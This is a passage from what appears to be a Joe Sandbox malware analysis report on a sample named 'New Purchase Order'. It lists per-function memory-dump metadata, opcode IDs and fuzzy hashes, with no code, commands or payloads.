                                                          • Instruction Fuzzy Hash: C2417B725083159BD720DF29C845B9BBBE8FF88754F008A2EF598D7291D770DA04CB92
                                                          Function 018380A0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2b6b8f1e66441f0c6da1291d6780ad911523e8990d40cec951e7ef691918577
                                                          • Instruction ID: f0d4e740603bd4194f60f3ce8e4c94b6a0c85553964d05c5a72b67a8c4b01339
                                                          • Opcode Fuzzy Hash: c2b6b8f1e66441f0c6da1291d6780ad911523e8990d40cec951e7ef691918577
                                                          • Instruction Fuzzy Hash: A841C271A05A1ADFDB11DF58C840AADB7B1BB95764F188329F815E7280DB34EE418BD0
                                                          Function 018C05A7 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49f8399dce7f3dcaa7739846c76744bb6c578fa29da8eaa92e262178993ec9de
                                                          • Instruction ID: f28eecb2705d35cefa851d284a448368a0b94190995fe9776e679ec6def7bc78
                                                          • Opcode Fuzzy Hash: 49f8399dce7f3dcaa7739846c76744bb6c578fa29da8eaa92e262178993ec9de
                                                          • Instruction Fuzzy Hash: 7641BF766087569BC320DF6CC840E6AB7A9FFC8B40F14462DF995D7680E730EA05C7A6
                                                          Function 01844859 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d30a6570fe5e3b57bccc9843ed5716e3843a7101e791d1d44d649cd744e1686
                                                          • Instruction ID: 093f0122c821eb3f39ec5c84e1762350d105b5f26c9bb940d3309f69ef877535
                                                          • Opcode Fuzzy Hash: 9d30a6570fe5e3b57bccc9843ed5716e3843a7101e791d1d44d649cd744e1686
                                                          • Instruction Fuzzy Hash: D9418E7560430A9BE725DF2CD884B2ABFAAEF80354F14442DEA46CB2A1DB70DA41DB51
                                                          Function 01838B50 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fbaa7942da961c54b9567b342ce2c21f6ce49ba1955e536c8d5df8c86e9dcff
                                                          • Instruction ID: a256c51ae28bb693325f669ab607554a7d7a3214c7bc45f3baedd858f5a2385d
                                                          • Opcode Fuzzy Hash: 5fbaa7942da961c54b9567b342ce2c21f6ce49ba1955e536c8d5df8c86e9dcff
                                                          • Instruction Fuzzy Hash: 9A4190B1A01609CFCB15DF6DC98099DBBF1FFC9324B18862AE466E7250DB349A41CB90
                                                          Function 018502E1 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction ID: 374a0ed2f992f1269f126603548e71ff9de18785ae60011c711d9960c264be21
                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction Fuzzy Hash: 4B311631A04248AFEB628B6CCC44BDBBFE9EF14354F0441A5F859D7353C6B49A84CBA1
                                                          Function 018EE3DB Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28ca292aba84d6b8c948a6fb356b562a68c056bf45443b61f54556e366bd7649
                                                          • Instruction ID: ecd3b71176e852700a937addf981ec4640d3782b991afa555e0f983b328a4e23
                                                          • Opcode Fuzzy Hash: 28ca292aba84d6b8c948a6fb356b562a68c056bf45443b61f54556e366bd7649
                                                          • Instruction Fuzzy Hash: 8E31B931750756ABD722AF598C85F6F76E9EF59B54F000028FA04EB391DAA4DE00C7E1
                                                          Function 018F4B4B Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5dcc4bd87ba833bc77723de485b080c4aaaf1e02a1e7102c15ea7c34c77844f
                                                          • Instruction ID: 2322451c8f640990b3679643144d234597b11ec0dba24bfb8e79f07ccb5467fd
                                                          • Opcode Fuzzy Hash: b5dcc4bd87ba833bc77723de485b080c4aaaf1e02a1e7102c15ea7c34c77844f
                                                          • Instruction Fuzzy Hash: 4E31AF326092019FC321DF1DD880F66B7F6FB84364F1A446EEA95CB252DB31AE41CB91
                                                          Function 01844260 Relevance: .1, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c300a2c77e0f0ff75493eebede1fd9278981150d7858f9f0970b8197dddb3d03
                                                          • Instruction ID: c1dc8c01741417387bbada38c9847495e74a95c5050cc1cd9da214e37f0d6f2c
                                                          • Opcode Fuzzy Hash: c300a2c77e0f0ff75493eebede1fd9278981150d7858f9f0970b8197dddb3d03
                                                          • Instruction Fuzzy Hash: 03419F71200B49DFE722DF28C481FDABBE9AF59754F10842DEA99CB251CB74EA04CB50
                                                          Function 018F4BB0 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9810ef81c85aba16d7599b280314f5f692d94946a0df7be8f1fdc3e75c3b053f
                                                          • Instruction ID: 9ec4010f1ff7ec6d65b17bf3e44c7a2c7de97039fd5c9d0e96062e89cb68ba4a
                                                          • Opcode Fuzzy Hash: 9810ef81c85aba16d7599b280314f5f692d94946a0df7be8f1fdc3e75c3b053f
                                                          • Instruction Fuzzy Hash: FB317E716042019FD320DF29C880B2BB7E5FB84724F15456EFA69DB251E730EE04CB92
                                                          Function 018BEB1D Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0328db59dcc9a1a4618dc31b1b5b204f9b6cacd810f45c8359220d422becd3f
                                                          • Instruction ID: ef209aa03d537b6e719844ef7fb0c6b9f00f18b9bbdc9461f0a818f682aba352
                                                          • Opcode Fuzzy Hash: b0328db59dcc9a1a4618dc31b1b5b204f9b6cacd810f45c8359220d422becd3f
                                                          • Instruction Fuzzy Hash: 8331B2312016869FF722575CCD98BE57BE8FB51B84F1D00A4BE46EB7D2DB28DA40C225
                                                          Function 019061C3 Relevance: .1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7c313488e6a90c7ca60be73f9c1603ef2399cf22d850e91af89dfdec7eba053
                                                          • Instruction ID: 2762ca3678455e81beb4542f5725a6e72b4b2924b578119ca5f856d630d865fb
                                                          • Opcode Fuzzy Hash: f7c313488e6a90c7ca60be73f9c1603ef2399cf22d850e91af89dfdec7eba053
                                                          • Instruction Fuzzy Hash: A531D076A0021AAFDB16DF9CC840BAEB7B9FB44B40F454168E904EB284D770ED10CBA0
                                                          Function 018E483A Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b11da0dd142ec307ea9522e35f36b8bae942f56e9600710257f8be32e9901ba5
                                                          • Instruction ID: ace90f2578259d219619959f8f787e5adf2ca53fe5dc11181cca07faa030dce1
                                                          • Opcode Fuzzy Hash: b11da0dd142ec307ea9522e35f36b8bae942f56e9600710257f8be32e9901ba5
                                                          • Instruction Fuzzy Hash: F8315776A4012DABCB21EF58DC48BDEB7F5AB99350F100095A908E7260DA30DF518F91
                                                          Function 0186EB20 Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b43a266032eea6f4ceb37810e055538b9610e843d795920e5a5563514011ed08
                                                          • Instruction ID: c5c1409e0fbcb896197fba04e98459e696be94d4789908f10daf6512aef126d8
                                                          • Opcode Fuzzy Hash: b43a266032eea6f4ceb37810e055538b9610e843d795920e5a5563514011ed08
                                                          • Instruction Fuzzy Hash: A531B176E00219AFDB22DFADCC40AAFBBB9EF04750F014465E916E7250D6709F008BA1
                                                          Function 019060B8 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd16171949ce297586df86b0f825d8e8d58bd22d011e2c045f0502f452d73c50
                                                          • Instruction ID: a2df514e5cc5268159097acc4de2bb77fc0480d3955a37c77fda47bdaafe2a21
                                                          • Opcode Fuzzy Hash: cd16171949ce297586df86b0f825d8e8d58bd22d011e2c045f0502f452d73c50
                                                          • Instruction Fuzzy Hash: 9A31A271B40606AFDB53DF9DC850A6AB7BAFF84754F014069E509DB381DB30DD118B90
                                                          Function 018407AF Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3394034f60c1016faf290869e0bee41ce876b7a9184789bd74d35484dfee873
                                                          • Instruction ID: 8ae44dd02648a47d15f6b2c82ac3f21594e7a98efa79df30064fafd559b572b6
                                                          • Opcode Fuzzy Hash: a3394034f60c1016faf290869e0bee41ce876b7a9184789bd74d35484dfee873
                                                          • Instruction Fuzzy Hash: F731F632A0474ADBD712DE288D80EABBBA5AFD4354F054529FE55D7301DE30DE0187E2
                                                          Function 01848550 Relevance: .1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11a06abdbc65a4926edfb58c3ac8f7818600cbe6e832d06a3f80ce4308f28b9d
                                                          • Instruction ID: a1951212f4bf859f27aea14ba67c7c7d6932d2943e548aeba252d662c2c7f28f
                                                          • Opcode Fuzzy Hash: 11a06abdbc65a4926edfb58c3ac8f7818600cbe6e832d06a3f80ce4308f28b9d
                                                          • Instruction Fuzzy Hash: D93169716093018FE720CF59C840B2ABBE6AB98710F45496EF998D7255D770EA44CB92
                                                          Function 0187A6C7 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction ID: db7ef0e3a55666e9808e94045d07e52d274712a6450031d23f6e92eb0d6124e8
                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction Fuzzy Hash: 39310E72B00701AFD765CF6DDD81B5BBBF8AB48B90F18452DA59AC3651E630EA00CB50
                                                          Function 018EEBD0 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 916ffaaa776a66c77e2fca105176ae57911dfef6ce6326bfdb5bafc4f502467a
                                                          • Instruction ID: 756fa35e033b54d64ff64a6c68673c247237336c1aef2a3e9567074eb47fba48
                                                          • Opcode Fuzzy Hash: 916ffaaa776a66c77e2fca105176ae57911dfef6ce6326bfdb5bafc4f502467a
                                                          • Instruction Fuzzy Hash: 883176B1519302DFCB21DF19C54895ABBF2FF8A318F0449AEE8889B351D7319A54CB92
                                                          Function 0186438F Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 468d9a883cdd3a0c2946a30eb5a28d242406bf1f2d6ebf77507490e380c7ae1c
                                                          • Instruction ID: ef84e1f7df52c6197c51cf2ee995f515d9fbd2ad4c836fff4007194cdae99e93
                                                          • Opcode Fuzzy Hash: 468d9a883cdd3a0c2946a30eb5a28d242406bf1f2d6ebf77507490e380c7ae1c
                                                          • Instruction Fuzzy Hash: 0E31F132B012069FD724EFA9C982A6EBBFDEB84304F00852AD506D7651D730EB41CB91
                                                          Function 0183CB7E Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction ID: dc215e5968649a13c074e85b88eec47be8a0db4a79093dcfbd9afe358fb7953b
                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction Fuzzy Hash: D1210632E0025AAADB159BB98800BAFBBB5EF54740F0984369E55F7340E370DA0187E1
                                                          Function 0183C156 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4cfb82d17dbae883a14b035c3a769dee0b9a408bfd1f674cc3cc503d6a7ed08
                                                          • Instruction ID: 5a5c3341336dda80df75f4893fcc3ed95cd0a90b7048fcefa2f1b1379d97fad4
                                                          • Opcode Fuzzy Hash: a4cfb82d17dbae883a14b035c3a769dee0b9a408bfd1f674cc3cc503d6a7ed08
                                                          • Instruction Fuzzy Hash: 453108B25002019BDB21AF6CCC40B6977B4EF91318F988269ED46DB346DE349B86CB94
                                                          Function 018FC3CD Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction ID: 3817489b4729b5b60f004166fab094e1493e44fdb383ebc51cdf8bd45b637910
                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction Fuzzy Hash: 78212B3660065AA6CB15AB998C40EBABFB4EF50710F40801EFB95C7691E735DB40C7A1
                                                          Function 0183E420 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30c7a5bcf179557f1669c22a450b95696dbb3ea2b2044abf43e9e40d34458daf
                                                          • Instruction ID: 0fe59ca94eb8a0f26cadaf3cfc518eaf94a99c6a4d02675e2ee7ab2da343508d
                                                          • Opcode Fuzzy Hash: 30c7a5bcf179557f1669c22a450b95696dbb3ea2b2044abf43e9e40d34458daf
                                                          • Instruction Fuzzy Hash: CE31A232A0152D9BDB31DA18CC81BEE77B9EB55740F0501A1EA45E7290E674AF808FD1
                                                          Function 01874588 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction ID: fc433dad682168b59ce03f6a0db55b3c037200ed2dcaa658c0ca21d5592daaa2
                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction Fuzzy Hash: 3D217F76A00609EBDB15CF98C980A9EBBB5FF48724F108069EE15DB241D671EF45CB90
                                                          Function 018744B0 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4ae1a1f0b8ed51e9f3b26d98f1952d5505c786cf97d19e434dda3422fee8ec0
                                                          • Instruction ID: 103029f19921895afcc7f4185c411a621e461969c5e13e28481a79aeefeb4f17
                                                          • Opcode Fuzzy Hash: e4ae1a1f0b8ed51e9f3b26d98f1952d5505c786cf97d19e434dda3422fee8ec0
                                                          • Instruction Fuzzy Hash: C321C1726047469BCB22DF18C880B6BB7E9FF88760F044529FD54DB641D730EE018BA2
                                                          Function 0183E388 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction ID: 74df7922d32be23d3732e777743b7a61a421fa68e52214ed773c4451392f6c61
                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction Fuzzy Hash: 57316B31600605EFDB21DF68C884F6AB7F9EF85354F1845A9EA52DB290E734EE01CB91
                                                          Function 018BE609 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e2bf6910e73e5cf06257be004b4efae636ba2632bcee4f9a20c6c2227a0c9a91
                                                          • Instruction ID: ba3696a4fefc5ff977728573c152eda68d45e39ce2cc03bb470d18821e568798
                                                          • Opcode Fuzzy Hash: e2bf6910e73e5cf06257be004b4efae636ba2632bcee4f9a20c6c2227a0c9a91
                                                          • Instruction Fuzzy Hash: C2317C75A0020AAFCB14CF1CC8849EEB7B5EF89304B15445AE81ADB391E731EB44CB95
                                                          Function 018C06F1 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32c639556d4ffd5b230db5ebe14dea3ae3877917be1d5edf1444d9fd29406274
                                                          • Instruction ID: 1981f998267fa014907231553ff28e867e6c08bb4265045d21ccd3acc6134178
                                                          • Opcode Fuzzy Hash: 32c639556d4ffd5b230db5ebe14dea3ae3877917be1d5edf1444d9fd29406274
                                                          • Instruction Fuzzy Hash: C5219C7590022ADBCB259F59C881ABEB7F8FF48740B500069F941EB240E738AE41CBA1
                                                          Function 018C019F Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40b234a84cf33fc851136538923c8a370bd615799b71e977430e83acaceac4d4
                                                          • Instruction ID: be7f12c77dabafa284c90151a957a80b20728027d50e0f7460e9664be70a774e
                                                          • Opcode Fuzzy Hash: 40b234a84cf33fc851136538923c8a370bd615799b71e977430e83acaceac4d4
                                                          • Instruction Fuzzy Hash: 6E218B75600645EBD716DB6CC940A6AB7B8FF98B80F140069F904D76A1D638EE40CB69
                                                          Function 018C0283 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4aa6a4b361330d84e309569a08709ed0ec1b5865218a72378b7956f65d1373e7
                                                          • Instruction ID: ff95757501fe63cd841aeed6192500d2abd72bf51949250881cbb2801bf1b583
                                                          • Opcode Fuzzy Hash: 4aa6a4b361330d84e309569a08709ed0ec1b5865218a72378b7956f65d1373e7
                                                          • Instruction Fuzzy Hash: CF219072904246DBD711DB6DC844B5BBBECEF91B84F08445ABD80CB251D634DB08C6A2
                                                          Function 01862835 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ded6061387a588b03492eabdbb5773e9c4e4e10bee53d7560e1e89e16cc42775
                                                          • Instruction ID: 48ef85256c47ffca58a6320fbadede333747f06b58028284fb29fc61883c2926
                                                          • Opcode Fuzzy Hash: ded6061387a588b03492eabdbb5773e9c4e4e10bee53d7560e1e89e16cc42775
                                                          • Instruction Fuzzy Hash: 2B210B316456859BF727576C8C04B287B99EF41B74F1803A4FE61EBAD2DB68CB01C241
                                                          Function 0187A30B Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0cacfaf8565c1d120a8ecccd01a41670882377bce342a4d2c16a3083e834346
                                                          • Instruction ID: 2bf03a31ab695bd14cdeb87a3e01080498f7596e4d8fa9d02975419f401a1f45
                                                          • Opcode Fuzzy Hash: b0cacfaf8565c1d120a8ecccd01a41670882377bce342a4d2c16a3083e834346
                                                          • Instruction Fuzzy Hash: 2F218E75200A419FC729DF29CD41B56B7F5FF48B48F288468A509CBB61E371EA42CB94
                                                          Function 018FA49A Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
